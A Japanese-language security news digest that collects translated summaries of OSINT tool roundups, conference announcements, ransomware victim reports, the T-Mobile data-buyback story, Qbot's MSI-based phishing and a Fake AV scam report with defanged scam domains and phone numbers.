週刊OSINT 2022-15号 / Week in OSINT #2022-15

Week in OSINTのイースターバージョンへようこそ！いくつかのヒント、サイト、暗号詐欺の情報、そして実際のイースターエッグもありますよ。

時々、「イースト・エッグ」（例）を入れています。読者の皆さんに、今見ているテキストの向こう側を見てもらいたいからです。読者が好奇心を持ち続け、他のものを見る方法を見つけることに挑戦するのが好きなのです。今週ご紹介する記事の先にも、ぜひ目を向けてみてください。

• Blockchain Detectives
• Webmii
• Redditle
• On Google Queries
• CBR OSINT CTF
• Hadzy

記事: Blockchain Detectives

マイケル・ジェームズのWeb3.0に関するプレゼンテーションを見たとき、これは私にとってまだ未知の領域であることに気づきました。このVICEの記事を読むと、この分野に飛び込んでいるのは彼だけではないことがわかります。この記事では、暗号ハッカーや詐欺を調査する方法について書かれています。詐欺の良い例もあり、興味深い内容です。

サイト: Webmii

Bashinho_Bashは、EUで最も効果的な人名検索エンジンは何かと考えていたところ、Webmiiがその一つであることを教えてもらいました。水面下でやっていることを見ると、GoogleのCSEのようで、数回検索すると「怪しいトラフィック」のため、もう私には何の情報も取得してくれません。もし誰かがもっと良いウェブサイトを持っていたら、彼に連絡して教えてもらうか、The OSINT Curious Project Discordサーバで共有してください!

サイト: Redditle

Discordで、SlayerLarom#1204によって共有された、とても素晴らしいリンクに出会いました。基本的にはGoogle検索なのですが、素敵なフロントエンドで、私たちが大好きな広告もありません。もしあなたが望むなら、あなた自身の検索エンジンをホストすることも可能です。

小技: On Google Queries

RedditleとWebmiiをテストしていたとき、ほんの数回検索しただけで結果が返ってこないことがわかりました。どちらのサイトも基本的にGoogle検索を実行したり、バックグラウンドでCSEを実行したりしているので、何が起こるかは皆知っていることです。Googleは、特に高度な検索演算子を使用する場合、複数のクエリを連続して実行することを好まないようです。その時、CAPTCHAを克服する何らかの方法が必要になります。WebmiiもRedditleもそうするためのものは何もなく、数分後には何も返ってこないウェブサイトになっていることに気づくでしょう。ですから、Google検索の練習は必ずしておいてください。

また、Matteo Duòによる最近のブログ記事で、40種類のGoogle検索演算子について説明されています。

サイト: CBR OSINT CTF

Twitterユーザーの@IFLinfosecは、TryHackMeでOSINT CTFを作成し、SecTalks CanberraのCTF質問のいくつかを追加しました。これらの質問に答えるには、ある程度のGoogleスキル、ソーシャルメディアに関する知識、そして賢い思考が必要です。ご協力ありがとうございました。

サイト: Hadzy

Ritu Gillが、YouTubeのコメントを読み込んで検索し、その統計情報を表示し、さらに基本的な感情を表すワードクラウドを搭載した新しいウェブサイトを公開した。このHadzyというツールは、YouTubeのビデオの中から必要なものを素早く見つけることができる、とても便利で使い勝手の良いツールのようです。

出典：Week in OSINT #2022-15

[イベント] black hat ASIA 2022 (2022/5/10-13)

Black Hat Asiaは、5月10日から13日までシンガポールで開催される、バーチャル（オンライン）イベントとライブ（対面）イベントの両方を提供するハイブリッドイベントです。期間中は、情報セキュリティの専門家によるインタラクティブなオンライントレーニング、ブリーフィングでの革新的な研究発表、アーセナルでの最新のオープンソースツールの紹介、ビジネスホールでのトップクラスのセキュリティソリューションやサービスプロバイダーの紹介、そして豊富なネットワークイベントや機会などが予定されています。

https://www.blackhat.com/asia-22/

[イベント] サイバーセキュリティシンポジウム道後2022(2022/6/30-7/1)

 

SEC道後2022では、「Cybersecurity for All ～誰ひとり取り残さないセキュリティの確保に向けて～」をテーマに、あらゆる方々がサイバー空間を利用することが見込まれる中、国民が安全で安心して暮らせるサイバー空間を確保するため、サイバーセキュリティ政策をはじめ、サイバー攻撃に対抗する技術や攻撃事例等について多様な側面から議論を深め、対策等につなげる機会にしたいと考えています。 また参加者同士の連携を深め、人的ネットワークの形成を図るため、講演に加えて、議論や交流の機会を設け、サイバーセキュリティに関わる様々な情報交換の場も提供いたします。

https://www.sec-dogo.jp/

[イベント] AusCERT2022 (2022/5/10-13)

AusCERT2022への登録はお済みですか？

エキサイティングなスピーカーと素晴らしいチュートリアルで満たされたプログラムに加え、非常に人気の高いサプライズが用意されていますので、お見逃しのないよう、今すぐご登録ください。

🚀 conference.auscert.org.au/ 👾

[イベント]Cybersecurity Week 2022（2022/5/17-19）

5月に開催されるイベント「Cybersecurity Week 2022」に参加しませんか？  

包括的なサイバーセキュリティ計画の策定と実施は、間違いなく日に日にその重要性と緊急性を増していますが、しばしば組織は何から手をつければよいのかわからなくなることがあります。巧妙化するマルウェアの出現、データ漏えいの脅威、そして組織が経済的損失と責任を負うリスクは、サイバーセキュリティとITのリーダーがかつてないほど適応する方法を学ぶ必要があることを意味します。

様々なセッションを通じて、私たちのことをよりよく知っていただき、お客様の組織における最大のセキュリティ課題に私たちがどのように対処できるかを知っていただくとともに、私たちの専門家パネルにご質問いただく機会を提供します。  

テーマ

• サイバーセキュリティの展望  
• 現在最も深刻なサイバーセキュリティの脅威  
• サイバーセキュリティの最新動向とベストプラクティス  
• データコンプライアンス規制  
• HelpSystemsのモジュール式サイバーセキュリティ・ソリューション 

出典：Cybersecurity Week 2022

ランサムウェアギャングが発表した被害組織リスト（2022年4月版）BY DARKTRACER

Dark Tracerによると、2022年4月は日本企業3社がランサムウェアの被害にあっている模様。

東京プラント株式会社(tokyo-plant.co.jp)

ポリプラスチックス株式会社(polyplastics.com)

プレスリリース（アーカイブ）

京成建設株式会社(keisei-const.jp)

プレスリリース（アーカイブ）

多くのビデオ、ニュースサイト、ブログ、ツール、Search、Geoint、CryptoなどがあるOSINTコレクション。Great OSINT collection with many videos, news sites and blogs, tools, and links to other pages like Search, Geoint, and Crypto. Simplified for ease of use.

多くのビデオ、ニュースサイトやブログ、ツール、Search、Geoint、Cryptoなど他のページへのリンクがある素晴らしいOSINTコレクションです。使いやすいように簡素化されています。

0. HOME - start.me

2500万円を支払って取り戻したはずの顧客データが闇市場で売られ続ける / T-Mobile Secretly Bought Its Customer Data from Hackers to Stop Leak. It Failed.～サイバー犯罪者に金を払っても無駄骨に終わる事例～

2021年、T-Mobileは、ハッカーが6ビットコイン（当時約27万ドル相当）で3000万人の顧客の個人データを売ると申し出て、侵害されたことを確認しました。公開された法廷文書によると、T-Mobileが雇った第三者は、そのデータへの独占アクセス権をハッカーに支払い、より広く流出しないように制限しようとしたという。

この計画は最終的に失敗し、犯人は第三者から合計20万ドルを渡されたにもかかわらず、データを売り続けた。しかし、このニュースは、企業がデータ漏洩に対応する際に、盗まれた情報の漏洩を軽減するため、あるいは誰が自社のネットワークに侵入したかを特定するために使われるかもしれない、議論を呼ぶような戦術をいくつか発掘している。

T-Mobileは、依頼した第三者がデータ流出を止めるためにサイバー犯罪者に数十万ドルを支払ったことを認識していたかどうかについてコメントを求めたが、回答は得られなかった。

2022年4月12日、司法省は、RaidForumsと呼ばれる人気のあるハッキングサイトの管理者であるとするDiogo Santos Coelhoに対する起訴状を公開しました。また、司法当局はRaidForumsのサイトにバナーをアップロードし、そのドメインを乗っ取ったことを発表しました。

Coelhoは2022年3月に英国で逮捕されました。彼の米国への引き渡し要求を支持する宣誓供述書に、2021年8月にRaidForumsで広告された特定のデータセットについて記述する部分が含まれています。

"2021年8月11日頃、「SubVirt」と名乗るユーザーが、RaidForumsのウェブサイトに、「SELLING-124M-U-S-A-SSN-DOB-DL-database-freshly-breached.」というタイトルで最近ハックしたデータの売却を申し入れたと投稿しました。" その後、Subvirtはスレッドのタイトルを "SELLING 30M SSN + DL + DOB database "に変更したと、文書は続けている。この文書では、被害者の企業名は記載されておらず、Company 3とされていますが、別の投稿では、「米国でサービスを提供している大手通信会社および無線ネットワーク事業者」に属するデータが確認されたと書かれています。

文書には、この会社が "犯罪者に売られるのを防ぐために、第三者機関に依頼してデータベースへの独占的なアクセス権を購入した "と書かれています。この第三者の従業員が購入希望者を装い、RaidForumsの管理者の仲介サービスを利用して、データのサンプルを5万ドルのビットコインで購入したと、文書には書かれています。その後、その従業員はデータベース全体を約15万ドルで購入し、SubVirtがデータのコピーを削除するという注意書きをしたと、文書には記されています。削除の目的は、盗まれた情報のコピーを持つのがこの潜入者だけとなることで、さらに情報が漏れる可能性を大きく制限することにある。

そんなことはない。文書によると、"共謀者たちは、第三者が購入した後も、データベースを販売しようとしたようだ "とあります。

裁判記録に含まれる情報を確認したところ、この第三者を雇った無名の電気通信会社であるCompany 3は、T-Mobileであった。RaidForumsの特定のスレッドが言及された数日後に、法廷文書で言及された情報漏洩のニュースを最初に明らかにしました。当時、SSNを含むデータを販売している人物に話を聞き、データのサンプルを入手したところ、ハッカーがT-Mobileの顧客に関する正確な情報を持っていることが確認されたそうです。T-Mobileは当時、自社に対するハッキングを調査中であるとの声明を発表しています。その1日後、T-Mobileはハッキングされたことを確認した。

裁判資料には、データを購入した第三者の名前も、それがどのような会社であるかも書かれていない。しかし、T-MobileのCEOであるMike Sievert氏は、8月に発表した過去の声明で、「この事件に関する我々の調査を通じて、世界的なセキュリティ専門家であるMandiantが当初からサポートしていたのですが、この悪者が我々のサーバーに不正侵入する方法がわかり、我々はそれらのアクセスポイントを閉鎖しています」と述べている。「この侵害による顧客データへの継続的なリスクはないと確信しています。」とも述べています。

Mandiantは、サイバー犯罪者に20万ドルを支払った第三者であるかどうかについてのコメントを求めたところ、すぐに返答はありませんでした。2022年3月、MandiantはGoogleに買収されることを発表した。

被害企業は、ハッキングされた後、インシデントレスポンスや脅威インテリジェンス会社を雇い、どのようにハッキングされたかを正確に把握し、さらなる被害拡大に対する緩和策を講じることがよくあります。

このような企業は、ハッカーに対して攻撃的に反撃する「ハッキングバック」など、議論を呼ぶ戦術を展開することがあります。たとえば、ハッカーのコマンド＆コントロールやその他のサーバーに侵入して盗まれたデータを確認したり、ハッカーのインフラに干渉したり、ハッカーが誰であるかについての情報を得ようとしたりするのです。ハッキンググループLAPSUS$がNvidiaを標的にした後、同グループはTelegramチャンネルへの投稿で、盗まれたNvidiaデータを保存するために同グループが使用していたマシンに誰かが侵入し、ランサムウェアを展開させたと主張しました。同グループは、具体的な証拠はないものの、これがNvidiaのために行われたと主張した。

出典：T-Mobile Secretly Bought Its Customer Data from Hackers to Stop Leak. It Failed.

次世代の検索エンジン / The Next Google

DuckDuckGoやBingは真の代替品ではなく、Googleの劣化版に過ぎない。

次のGoogleは、リンクを吐き出すだけの入力ボックスであってはならないのです。新しい発想で、これまでよりもずっと優れたものを作る必要があるのです。

ここ数年、さまざまな人々が同じ結論に達し、次世代の検索エンジンの開発に取り組み始めました。

この新しい世代にとって、プライバシーは必要であり、侵略的な広告はオプションではありません。しかし、共通点はそこまでです。その先は、検索エンジンのアイデアをまったく異なる方向に持っていったのです。

Kagi – The Customization Engine

なぜ、誰もが同じ検索体験をしなければならないのか？私たちは皆、物事がどのように見えるか、どのように機能するかについて、自分自身の好みを持っています。

Kagiは、これまでで最もカスタマイズ性の高い検索エンジンです。表面的な見栄えから、最終的な検索結果のランキングまで、すべてを変更することができます。

"検索エンジンの見た目や使い勝手の好みは、人それぞれです。私たちのゴールは、平均的なユーザーのために平均的な検索エンジンを作るのではなく、ユーザーがそれを実現するためのツールを提供し、力を与えることです。平均的な人間なんていないのですから。- Vladimir Prelovac（ウラジミール・プレロヴァチ）、Kagiの創設者

Visual Customization

ビジュアル面では、カスタムCSSの記述も可能で、見た目のすべてを変更することができます。

Search Customization

さらに重要なのは、検索エンジンの動作そのものをカスタマイズできることです。検索候補を表示させたいですか？スニペットをどの程度詳細に表示するか？

また、「Instant Answers」「Inline Discussions」「Listicles」などのウィジェットを切り替えて使用することができます。これらのウィジェットは、特定の種類の結果をグループ化したもので、結果ページに含めるかどうかを選択することができます。リスティング広告を二度と見たくない場合は、リスティング広告ウィジェットをオフに切り替えてください。

しかし、検索のカスタマイズはさらに進んで、個々のWebサイトのレベルにまで踏み込むことができます。独自ドメインのランキングを作成し、どのウェブサイトを上位にし、どのウェブサイトを下位にするか、Kagiに指示することができます。

また、二度と見たくないサイトをブロックしたり（pinterest）、常に上位に表示させたいサイトをピン留めすることも可能です（reddit）。

「iPhoneのホーム画面を全く同じにする人はいません。特に、私たちの生活の重要な一部である検索では、人々はそれに値すると思います。iPhoneは最もよく使われる製品の一つであり、カスタマイズの少なさには驚かされます。- Vladimir Prelovac, Kagiの創設者

Lenses

また、Kagiでは、レンズと呼ばれるWebサイトのフィルターを作成することができます。任意のレンズで、特定のサイトを含めたり、除外したりすることができます。

検索時には、さまざまなレンズをオンにして、そのフィルターに一致する結果を表示することができます。Kagiには、ディスカッション、プログラミングヘルプ、レシピのようなレンズがあらかじめ用意されています。

Non-commercial Results

もう一つ、Kagiが力を入れているのが、非商用での成果物配信です。Kagiは非商用サイトの全インデックスを持ち、それをTeclisとして別途公開しています。これにより、Googleや他のほとんどの検索エンジンでは見つけられないような結果を見つけることができるのです。

例えば、「スティーブ・ジョブズ」で検索すると、上位はGoogleと同様、情報系のものがほとんどです。しかし、そのすぐ後に「Interesting Finds」という項目があり、Derek Siversの楽しいブログ記事、日本でのスティーブ・ジョブズのエピソードが詰まった記事など、Googleでは見つけられないようなクールなものが表示されます。

Neeva – The Everything Engine

なぜ検索エンジンはウェブだけをインデックスしなければならないのか？あなたが気になる情報の多くは、メールやメモ帳アプリなどに散らばっています。

Neevaは、すべてを検索できる検索エンジンです。

今ならGoogle Apps、Dropbox、Notionなどを連携させることができます。

何を探しているのか、どこにあるのか、Neevaはそれを見つける手助けをします。個人文書の検索は、クエリに「@me」を追加するだけで簡単にできます。これによって、誰もがパーソナルな検索エンジンを持つことができます。

これがニーバの面白さの一つです。

You.com – The App Engine

Googleでコーディングの問題を検索すると、Stack Overflowの回答が表示されます。You.comで検索すると、Code Completeアプリが言語モデルを使ってコードスニペットを一から生成してくれます。

You.comはウェブをアプリの集合体として捉えており、ユーザーの問い合わせに対して最も関連性の高いアプリをマッチングさせることを目標としています。コーディングの質問には、AI Code Generatorアプリがありますが、Stack Overflowも「アプリ」であり、サイドバーで開いて簡単にコードをコピーすることができます。

Quick Facts」アプリは、短い事実情報を得ることができ、「Medium」アプリは、サイドバーで簡単に記事を読むことができます。

Andi – The Conversation Engine

検索エンジンはそんなに無個性でなければならないのでしょうか？私たちは、クエリを入力するとリンクのリストが返ってくることに慣れていますが、Andiはこれを逆手に取っています。

Andiは、「質問に答えてくれて、役に立つリンクを送ってくれる賢い友人とのメッセージング」のような、会話型の検索体験を提供してくれるのです。

Andiの焦点は、最適なソースから答えを抽出することで、特定の質問に答えることです。

例えば、Googleで「中国とニュージーランドの一人当たりのGDPはいくらですか」と検索すると、答えのない整形された表が返されます。

同じことをAndiで検索すると、あなたに合った情報が抽出されます。

Brave Search – The Independent Engine

これまで述べてきたすべての検索エンジンは、どんなにクールな機能を構築していたとしても、完全に独立したインデックスを持っているわけではありません。

これらはすべて、GoogleやBingから結果の一部を得ているのです。

独立したインデックスを構築することは、現在のウェブの規模を考えると、非常に難しい問題です。完全に独立したインデックスを持つ検索エンジンの数は、片手で数えられるほどです。

このリストにある多くの検索エンジンは、いつかは完全に独立したインデックスを持つことを目指していますが、Brave Searchほどこのことに注力している検索エンジンはないでしょう。

Braveで検索すると、検索結果の何パーセントが独自のインデックスから来たものなのかがわかります。この数字は、100％であることを望んでいるため、はっきりと表示されます。

Brave Searchでは、クールな新機能はあまり見られません。なぜなら、彼らは検索エンジンにとって重要であると信じている1つのことにレーザーフォーカスしているからです。

検索エンジンの新しい波は、まだ始まったばかりです。その多くは最近ローンチしたばかりです。

まだ完璧ではないにせよ、彼らが模索している道は、停滞した検索スペースに有望な新機軸をもたらす可能性があります。

出典：The Next Google

週刊OSINT 2022-14号 / Week in OSINT #2022-14

今号もリンク、ヒント、ツール、そして短いチュートリアルが満載です。

ちなみに、トップの絵はベラルーシの芸術家クリチコ氏が製作した、戦争による無数の廃墟と死傷者の写真を組み合わせて描かれたプーチンの肖像です。

先日 SANS OSINT Summit がありました。NTFやEthereumから文書化と報告の重要性まで、幅広いトピックで、約12時間、本当に素晴らしい講演が行われました。もし、興味があれば、SANS Cyber Defence の公式 YouTube ページに注目です。今後、数日から数週間のうちに、オンラインでビデオを公開する予定です。

• SANS OSINT Summit
• Creating Local Transforms
• Identification Documents
• RadarAtlas
• What is OSINT?

リンク: SANS OSINT Summit

先日、SANS OSINT Summit 2022が開催され、12時間にわたって素晴らしい講演者たちが様々なトピックについて語りました。ディープフェイクからダークウェブの調査、ブロックチェーンの調査、CloudFlareアドレスの背後を見つけることまで、非常に長い一日でしたが、講演の質は非常に高かったです。すべての講演がオンラインで見られるようになるまでは、公式の「SANS リンク コレクター」であるキャシーがさまざまな講演から取得したすべてのリンクに目を通すことができます。

メディア: Creating Local Transforms

sinwindieが、Maltegoのローカルトランスフォームを作成するためのビデオをアップロードしました。プログラミングが苦手な人には向かないかもしれません。しかし、サードパーティのツールに頼りたくないとき、あるいは、あるツールが何をするのか正確に知りたいとき、自分で作成することは良い方法です。もちろん、特定の作業を何度も行うのであれば、自分で自動化するのも悪くありません。

小技: Identification Documents

TwitterユーザーのOH SHINT！さんが、パスポートや旅行書類に関するいくつかのリンクをシェアしています。彼のTwitterスレッドでは、小さな自治体への複数のリンクが共有されていますが、最初のツイートには、最も重要な3つのリンクが含まれています。まず、エジソンの旅行書類に関する公式サイトです。2つ目は、パスポートスタンプの概要を説明したWikiwand。そして3つ目は、イタリアのサイトで、運転免許証、自動車登録証など、自動車の公式な書類作成に関連するあらゆる情報を提供しています。これらの素晴らしいリンクに感謝します。

ツール: RadarAtlas

少し前に、Cyber DetectiveからADS-Bの画面と未知の拡張機能が表示されたツイートがありました。コメントを見てみると、Twitterユーザーの'thebaldgeek'さんがツール本体へのリンクを貼っていました。RadarAtlas Dashboard。このツールには、興味深い人々、国、企業のグループに対するフィルターが組み込まれており、また、自分だけのフィルターを作成することもできます。どのように機能するのか？ADS-B Exchange用のカスタムURLを作成し、新しいフィルタでページをリロードするだけです。

小技: What is OSINT?

OSINT Unleashedによる素晴らしいスレッドで、ツール、方法論、オープンソース情報からインテリジェンスを作成するプロセスについて触れている。OSINTはツールだけではなく、それを使って何をするか、さらに重要なのは、見つけたデータや情報を使って何をするかということなのです。

オマケ: On the Topic of Tools

最後に、道具の使い方についてひとつだけ......。Zewenが正しいことを皆知っているので 

出典：Week in OSINT #2022-14

添付ファイル(特に.ZIPファイル)は、今後は不審ファイルとして駆除すべき。/ Treat any attachment as suspicious, especially if it's a .ZIP file.

Qbotボットネットは、現在、悪意のあるMSI Windows Installerパッケージを含むパスワードで保護されたZIPアーカイブを添付したフィッシングメールを通じて、マルウェアのペイロードを送りつけています。

Qbotの運営者は、フィッシングメールで悪意のあるマクロを含むMicrosoft Officeドキュメントをターゲットのデバイスに落としてマルウェアを配信する標準的な方法から、この戦術を使うのは今回が初めてです。

この動きは、マイクロソフトが1月にExcel 4.0（XLM）のマクロをデフォルトで無効にした後、2月にVBA Officeマクロによるマルウェア配信を停止する計画を発表したことに対する直接的な反応ではないかと、セキュリティ研究者は考えています。

マイクロソフトは、VBAマクロの自動ブロック機能を、2022年4月上旬にCurrent Channel (Preview) のVersion 2203から、その後他のリリースチャネルや古いバージョンにも展開し、Office for Windowsユーザーへの提供を開始しました。

マイクロソフトは12月、「攻撃者がQakbotを配信するために使用している電子メールの手法はさまざまですが、これらのキャンペーンでは、Office文書、特にExcel 4.0のマクロに悪意のあるマクロを使用していることが共通しています」と発表しています。

"脅威は検出を回避する試みとしてExcel 4.0のマクロを使用しますが、この機能は現在デフォルトで無効になっているため、このような脅威が適切に実行されるためには、ユーザーが手動で有効にする必要があることに留意する必要があります。"

Office文書に埋め込まれた悪意のあるVBAマクロは、Qbot、Emotet、TrickBot、Dridexなど、フィッシング攻撃で多くのマルウェアを送り込む手法として一般的なため、今回のセキュリティ改善はOfficeユーザーの保護に向けた重要な改善と言えます。

出典：Treat any attachment as suspicious, especially if it's a .ZIP file. 

出典：Qbot malware switches to new Windows Installer infection vector

優れたセキュリティリーダーの10のサイン / 10 Signs of a Good Security Leader

1. 戦略的な思考と計画
   
   セキュリティ組織には、強力なリーダーからの指導と指示が必要です。そのリーダーは、ビジネスにとって最も重要なリスクと脅威の優先順位を決め、それらのリスクと脅威を軽減するための戦略を考案する必要があります。この戦略によって、ビジネスのセキュリティ体制を向上させるためのさまざまな取り組みが行われるはずです。セキュリティチームは、戦略や計画に忠実でありながら、これらの取り組みを実施するための体制を整える必要がある。
   
   
2. 緩急自在(急がば回れ)
   
   強力なリーダーは、安全保障に戦略的で整然としたアプローチをもたらします。そのようなアプローチで、目標や目的に向かって前進することができるのです。これは、たとえ明るく輝くものが視界に入ったとしても、集中し続けることを意味します。新たな気晴らしを追い求めて走り出したくなるかもしれませんが、それは、セキュリティ組織が最も重要だと判断した分野の進展を妨げることになるだけです。もちろん、チームはデータに基づき、十分な情報を得た上で、必要に応じて進路を調整する必要があります。しかし、その時々の話題に基づいて頻繁に方向転換することは、やってはいけないことです。
   
   
3. すべてがドキュメント化されている
   
   以前、"書き残されていないことは、なかったことになる "と言われたことがあります。彼は全く正しかった。戦略、戦略的イニシアティブの実施計画、プロセス、プレイブックなど、どんなものであれ、すべてはきちんと文書化されるべきなのです。強力なセキュリティリーダーは、オープンで、透明性の高い文化を浸透させ、セキュリティチームが物事をきちんと文書化することを奨励する。これは、企業の士気やセキュリティ態勢に好影響を与えるだけでなく、方針やプロセスを見直し、建設的に批評して改善できるという利点もある。
   
   
4. 有言実行
   
   多くの人が、話をすることができます。しかし、実際に歩くことができる人は何人いるでしょうか？強力なセキュリティ・リーダーは、自分が話す言葉よりも、行動ともたらした結果によって評価されることを知っています。そのため、彼らは、あらゆる面でセキュリティプログラムの状態を前進させることに現実的に焦点を合わせています。彼らは、リーダーシップ、戦略的思考、計画実行能力を、言葉よりも行動で示すのです。
   
   
5. 優れたコミュニケーションスキル
   
   良いアイデア、素晴らしい計画、素晴らしい成果、大きな進展は、うまく伝えられなければ、セキュリティチームの価値を示すことはできません。強力なセキュリティリーダーは、このことを理解しており、さまざまな問題やテーマを深く理解することに時間をかけます。この理解をもとに、必要に応じて正確で効果的なコミュニケーションを行い、セキュリティチームの取り組みがよく理解され、セキュリティに協力する方法と理由がビジネスに理解され、チームの成果が評価されるようにします。
   
   
6. 人材の育成・登用
   
   優れたセキュリティ組織には、優れた人材がいる。優秀な人材がセキュリティ組織に留まるのは、その使命を信じ、自分のスキルを伸ばし続け、日々興味深い仕事に挑戦し、リーダーに対する信頼があるときです。強力なセキュリティリーダーは、このような環境を作り、才能を育て、促進します。そうすることで、素晴らしいチームを作ることができるのです。
   
   
7. 無私無欲
   
   強力なセキュリティリーダーは、チームとミッションを最優先します。彼らは無私無欲です。何か問題が起きれば責任を負い、何かうまくいけばチームに賞賛を与えます。このような崇高な行動は、セキュリティチームとビジネス全体に対する信頼を築く上で大きな役割を果たします。また、チームとミッションのために自らを捧げるよう、周囲を鼓舞します。
   
   
8. タイムリーな意思決定
   
   タイムリーな意思決定を行うことは、必ずしも容易ではありません。私たちは、決断するために必要なすべての情報を持っているとは限りません。また、自分の判断が正しいかどうかもわからないことがあります。強力なセキュリティ・リーダーは、優柔不断な判断が麻痺した環境を作り出し、それが企業のセキュリティ体制にとって決して良いことではないことを理解しています。そのため、チームのために十分な知識と計算に基づいてリスクを取り、厳しい決断を下します。
   
   
9. どんな質問にも直接答える
   
   中には難しい質問もあります。しかし、どんなに難しい質問であっても、強力なセキュリティ・リーダーは、その質問に直接答える必要があることを知っています。そうすることで、真実と透明性が支配的な風となり、どんな質問でも、たとえ厳しい質問でもできる環境が生まれます。このような環境は、強固なセキュリティ・プログラムにとって重要な要素です。
   
   
10. 賞賛を与える
    
    強力なセキュリティ・リーダーは、自分たちの行動や成果を報道されたり、賞賛されたりすることを心配しない。データ、数字、結果が自ずと明らかになることに満足するのです。そのため、セキュリティチーム内であれ、ビジネス上の他の場所であれ、称賛されるべきところには称賛を贈ることを恐れません。その結果、信頼が生まれ、セキュリティリーダーが重要だと考えることに人々が取り組むようになります。これらのことは、企業のセキュリティ態勢を改善しようとするセキュリティ部門にとって、良い知らせです。

出典：10 Signs of a Good Security Leader:

2022年第1四半期のニセウイルス対策ソフト動向 / Fake AV phishing spikes in Q1 2022

2022年第1四半期にFake Anti-Virus (ニセウイルス対策ソフト)のフィッシングページの数が顕著に増加していることが判明しました。毎日行っているフィッシング詐欺のスキャンでは、これらの詐欺ページのソースコードに出くわすことは（あったとしても）ほとんどありません。しかし、今年の第1四半期だけで、WindowsとAppleデバイスのユーザーをターゲットにした50以上のサンプルを収集しました。

これまでに収集されたキットは、共通の開発テンプレートに緩く基づいていますが、フラットな検出に関しては、ややユニークさを保つために十分なバリエーションがあります。これらの詐欺のページに対するキットハンターの検出は、今朝早く更新されました。

ニセウイルス対策ソフト

ウイルス対策ソフトの詐欺ページは、Windows XPの時代から20年ほど前から存在しています。これらは、ブラックハットSEO詐欺と関連していることが多いのですが、これらのドメインへのリンクは、フォーラムやブログのコメント、インスタントメッセージ、ソーシャルメディアを介して共有されることもあるのです。

ブラックハットSEOとは、人気のある検索キーワードを利用して、悪意のあるページをSERP（検索エンジン結果ページ）の上位に表示させる詐欺のことです。今日でも、ブラックハットSEOの手口は、大きなニュースイベントやトレンドトピックに関連していることが一般的です。ブラウザベースの攻撃の全盛期には、ブラックハットSEOは、ソフトウェアの脆弱性を狙ってマルウェアを拡散したり、人々を騙して偽のAVページを読み込ませたりするために使用されていました。当時は、Internet Explorerや、Flash、Shockwave、PDFといったAdobe製品などがよく標的とされていました。

ニセウイルス対策（Fake AV）は、ソーシャル系詐欺のカテゴリーに属します。つまり、Fake AVはフィッシングの典型例ではないものの、スタイルや機能は似ているのです。

この詐欺の手口は、「技術的な理解不足」と「恐怖心」という2つの要素に依存しています。技術的な理解とは、コンピュータの操作やセキュリティに関する知識の欠如、およびサポートの仕組みに関する一般的な誤解を中心としたものです。恐怖の要素は単純で、これらの詐欺ページのポップアップや警告の多くは、システム感染やモラル（例：ポルノ）の暴露などを口実にしたものです。偽AVのページでは、開発者や詐欺の範囲によって、問題のある検出と暴露が混在していることがあります。

Fake AVページの攻撃形式はまちまちです。ある種のダウンロードやインストールを要求する詐欺もあれば、（最近観測されたような）サポートに「電話」して支援を受けるよう被害者に要求するものもあります。

インストーラーを要求している場合、詐欺師は何を出してくるかわかりません。感染したシステムからファイルや機密情報を取得するマルウェアであったり、被害者のシステムに持続的にアクセスするソフトウェアであったりする可能性があります。

被害者が画面に表示された番号に電話をかけると、個人情報や金銭的な情報が危険にさらされるだけでなく、詐欺師が被害者のシステムに追加のソフトウェアをインストールする機会を与え、被害者がさらなる攻撃や迷惑を被る可能性があります。

偽ウイルス対策ソフトの例

今期これまでにダウンロードされたキットに見られるバリエーションの一例として、最も一般的な3つのキットの概要を紹介します。図1に見られるように、トップのターゲットはWindowsユーザーです。

それぞれの詐欺の手口には共通点があります。

• 1つ目は、ブラウザのウィンドウが、感染症やマルウェアの種類にまで言及したポップアップ、アラート、警告で埋め尽くされることです。時には、ブラウザがフルスクリーンに押し出され、被害者はこの変更を元に戻すことが困難になります。
  
  

• Windowsをターゲットにした詐欺は、警告を引き起こすセキュリティメカニズムとしてWindows Defenderを活用します。Windows Defenderは有名なブランドであり、被害者がその名前をグーグルで検索した場合、これらの詐欺のページでその名前が使われることで、すぐに正当性を示すことができるようになっているのです。

• 多くのブラウザの要素が無効化されるため、被害者はブラウザの制御をある程度失う。機能や制御を回復することは問題です。これは、感染を再現するためのもので、意図的なものです。

• 最後に、このような詐欺のページでは、偽のマウスポインタが表示され、マウス機能が完全に無効になるか、いくらか妨げられるようになっています。このような場合、偽のマウスポインターは画面上を動き回ることになる。これも感染を装ったものである。

また、共通する要素として、言語の切り替えがあります。偽AV詐欺のページの多くには、画面に表示されるテキストを被害者の母国語で表示するコード要素が含まれています。この翻訳には多少の欠陥があり、ネイティブスピーカーにスクリプトを書かせるのではなく、翻訳サービスを利用したことがうかがえます。

脅威情報を以下に記します。また、技術者でない家族や友人には、これらの脅威について警告し、危険にさらされないようにしてください。

サポート詐欺電話番号：

(050) 5806-7793 

(050) 5534-0312

+1-507-889-1818 

+1(877) 337-3615 

+1-888-202-9313 

+1-(901)-810-3196 

ドメイン:

044lacked[.]ga 
124iteration[.]ga 
202configured[.]ga 
244iteration[.]ga 
303foeproweiw[.]ga 
388gwowowka[.]ga 
388hwpwodnf[.]ga 
487owppaasj[.]ga 
532gigabyte[.]ga 
588gwpwoek[.]ga 
935lacked[.]ga 
dbchebdjej[.]ga 
dhshdbwb[.]ga 
djrbrdeth[.]ga 
fhtvjdgjt[.]ga 
gr494lapeorwgr[.]ga 
hdbcgfnsnm[.]ga 
rl939malwaring[.]ga 
vhagyionvah[.]ga 
whfjgjg[.]ga 

---

039bapwpdk[.]ml 
042aoeowiwra[.]ml 
388daowpwiw[.]ml 
487hapqpwks[.]ml 
584lurking[.]ml 
638lapqkneps[.]ml 
689lurking[.]ml 
755gigabyte[.]ml 
ejgdhvdf[.]ml 
gr245gigabyte[.]ml 
ib309madenaing[.]ml 
nvbchdnvd[.]ml 
rw424bundling[.]ml 
yk498partically[.]ml 

---

alexacartbox[.]online 
balluthree[.]online 
ci48nco[.]online 
gloweranew[.]online 
greatofalltime[.]online 
lutinswipinfo[.]online 
msg67jp8[.]online 
onegoalsearch[.]online 
otherservicesdomains[.]online 
teamhourisimportant[.]online 

---

dfgjdfgjdf1[.]xyz 
dpillsnewgofit[.]xyz 
expediagrouping[.]xyz 
fghsdfghdgh7[.]xyz 
letmefityou[.]xyz 

---

cleaningkyotoservices[.]digital 
priceamazing[.]digital 
priceexcelsheet[.]digital 

---

3mjbfdmvn[.]shop 
claimeventgameterbaru[.]duckdns[.]org 
passagiert[.]cf 
rytjghsbdghjjh5[.]sbs 

出典：Fake AV phishing spikes in Q1 2022:

